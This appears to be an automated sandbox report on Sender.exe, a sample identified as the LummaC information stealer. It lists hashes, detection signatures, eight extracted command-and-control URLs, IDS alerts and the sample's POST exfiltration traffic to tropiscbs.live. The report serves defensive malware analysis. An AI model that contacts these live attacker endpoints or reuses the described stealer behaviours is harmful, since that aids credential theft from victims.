Windows Analysis Report
Sender.exe

Overview

General Information

Sample name: Sender.exe
Analysis ID: 1675540
MD5: 39e94524e19c217d1f19208a42a12947
SHA1: 32ecfdad659adfc975c9bf3ac8f9c07d807392ac
SHA256: 4ba36a1aa022e87ce24ff7030e64e630d3652d7d5ab5ebb8368f27ebad47bcc3
Tags: exe, user-LuRisa323

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal from password manager
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • Sender.exe (PID: 4768 cmdline: "C:\Users\user\Desktop\Sender.exe" MD5: 39E94524E19C217D1F19208A42A12947)
  • cleanup

Malware Configuration

{
  "C2 url": [
    "tropiscbs.live/iuwxx",
    "geographys.run/eirq",
    "woodpeckersd.run/glsk",
    "cartograhphy.top/ixau",
    "biosphxere.digital/tqoa",
    "topographky.top/xlak",
    "climatologfy.top/kbud",
    "vigorbridgoe.top/banb"
  ],
  "Build id": "0BD90D4887DDF55E6B8590FC3CEF03F7"
}

Yara Overview

Source | Rule | Description | Author | Strings
00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
0.2.Sender.exe.a00000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

Sigma Overview

No Sigma rule has matched

Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-27T18:36:32.751218+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49710 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:34.823970+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49711 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:36.252016+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49712 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:37.688311+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49715 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:40.067823+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49717 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:41.654673+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49718 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:44.706836+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49721 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:32.751218+0200 | 2061860 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49710 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:34.823970+0200 | 2061860 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49711 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:36.252016+0200 | 2061860 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49712 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:37.688311+0200 | 2061860 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49715 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:40.067823+0200 | 2061860 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49717 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:41.654673+0200 | 2061860 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49718 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:44.706836+0200 | 2061860 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49721 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:32.180353+0200 | 2061859 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53304 | 1.1.1.1 | 53 | UDP

AV Detection

Source: Sender.exe | Avira: detected
Source: https://tropiscbs.live:443/iuwxxD | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live/ | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live/PgY | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live/iuwxx | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live//gV | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live/hg | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live:443/iuwxx | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live/iuwxxoY | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live:443/iuwxxbcryptPrimitives.dll | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live/iuwxxuu | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live/=gD | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["tropiscbs.live/iuwxx", "geographys.run/eirq", "woodpeckersd.run/glsk", "cartograhphy.top/ixau", "biosphxere.digital/tqoa", "topographky.top/xlak", "climatologfy.top/kbud", "vigorbridgoe.top/banb"], "Build id": "0BD90D4887DDF55E6B8590FC3CEF03F7"}
Source: Sender.exe | Virustotal: Detection: 70%
Source: Sender.exe | ReversingLabs: Detection: 66%
Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: tropiscbs.live/iuwxx
Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: geographys.run/eirq
Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: woodpeckersd.run/glsk
Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: cartograhphy.top/ixau
Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: biosphxere.digital/tqoa
Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: topographky.top/xlak
Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: climatologfy.top/kbud
Source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp | String decryptor: vigorbridgoe.top/banb
Source: Sender.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: Sender.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2061859 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live) : 192.168.2.4:53304 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49715 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49711 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49721 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49712 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49710 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49718 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2061860 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI : 192.168.2.4:49717 -> 104.21.77.203:443
Source: Malware configuration extractor | URLs: tropiscbs.live/iuwxx
Source: Malware configuration extractor | URLs: geographys.run/eirq
Source: Malware configuration extractor | URLs: woodpeckersd.run/glsk
Source: Malware configuration extractor | URLs: cartograhphy.top/ixau
Source: Malware configuration extractor | URLs: biosphxere.digital/tqoa
Source: Malware configuration extractor | URLs: topographky.top/xlak
Source: Malware configuration extractor | URLs: climatologfy.top/kbud
Source: Malware configuration extractor | URLs: vigorbridgoe.top/banb
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49711 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49715 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49712 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49710 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49718 -> 104.21.77.203:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49717 -> 104.21.77.203:443
Source: global traffic | HTTP traffic detected: POST /iuwxx HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 41 | Host: tropiscbs.live
Source: global traffic | HTTP traffic detected: POST /iuwxx HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=b9KQrht4n | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 19566 | Host: tropiscbs.live
Source: global traffic | HTTP traffic detected: POST /iuwxx HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=Gnf88AvpKC995A | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 8748 | Host: tropiscbs.live
Source: global traffic | HTTP traffic detected: POST /iuwxx HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=CCvd1Ar39E9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 20386 | Host: tropiscbs.live
Source: global traffic | HTTP traffic detected: POST /iuwxx HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3Q5bUbGM7Q | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 2221 | Host: tropiscbs.live
Source: global traffic | HTTP traffic detected: POST /iuwxx HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=G439QGWWjdM6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 551525 | Host: tropiscbs.live
Source: global traffic | HTTP traffic detected: POST /iuwxx HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 79 | Host: tropiscbs.live
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: tropiscbs.live
Source: unknown | HTTP traffic detected: POST /iuwxx HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 41 | Host: tropiscbs.live
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Sender.exe, Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244298918.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1172718970.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.0000000000657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live/
Source: Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live//gV
Source: Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live/=gD
Source: Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live/PgY
Source: Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live/hg
Source: Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live/iuwxx
Source: Sender.exe, 00000000.00000003.1192811300.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1192689490.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1192773770.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live/iuwxxoY
Source: Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live/iuwxxuu
Source: Sender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.000000000064E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live:443/iuwxx
Source: Sender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1172718970.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.000000000064E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live:443/iuwxxD
Source: Sender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tropiscbs.live:443/iuwxxbcryptPrimitives.dll
Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Sender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.77.203:443 -> 192.168.2.4:49721 version: TLS 1.2
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006D14EA0_3_006D14EA
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CA5790_3_006CA579
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CACD00_3_006CACD0
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CAA030_3_006CAA03
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E850C0_3_006E850C
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E850C0_3_006E850C
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E92AD0_3_006E92AD
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E92AD0_3_006E92AD
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E92AD0_3_006E92AD
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E92AD0_3_006E92AD
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E850C0_3_006E850C
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006E850C0_3_006E850C
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006D14EA0_3_006D14EA
      Source: C:\Users\user\Desktop\Sender.exeCode function: 0_3_006CAA030_3_006CAA03
      Source: Sender.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: Sender.exeStatic PE information: Section: UPX1 ZLIB complexity 0.9898781819908815
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\Sender.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Sender.exe, 00000000.00000003.1178448012.0000000002F6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: Sender.exeVirustotal: Detection: 70%
      Source: Sender.exeReversingLabs: Detection: 66%
